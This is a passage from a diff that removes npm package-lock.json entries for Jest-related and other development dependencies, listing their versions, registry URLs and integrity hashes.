"sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - 